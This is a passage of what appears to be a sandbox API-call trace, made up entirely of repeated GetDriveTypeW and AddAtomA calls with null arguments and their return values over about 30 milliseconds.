0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.519] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.519] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.520] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.520] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.522] AddAtomA (lpString=0x0) returned 0x0 [0093.522] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.523] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.523] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.524] AddAtomA (lpString=0x0) returned 0x0 [0093.524] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.525] AddAtomA (lpString=0x0) returned 0x0 [0093.525] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.526] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.526] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.527] AddAtomA (lpString=0x0) returned 0x0 [0093.527] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.528] AddAtomA (lpString=0x0) returned 0x0 [0093.528] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.529] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.529] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.530] AddAtomA (lpString=0x0) returned 0x0 [0093.530] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.531] AddAtomA (lpString=0x0) returned 0x0 [0093.531] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.546] AddAtomA (lpString=0x0) returned 0x0 [0093.546] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.546] AddAtomA (lpString=0x0) returned 0x0 [0093.546] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.546] AddAtomA (lpString=0x0) returned 0x0 [0093.546] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.547] AddAtomA (lpString=0x0) returned 0x0 [0093.547] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.548] AddAtomA (lpString=0x0) returned 0x0 [0093.548] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.549] AddAtomA (lpString=0x0) returned 0x0 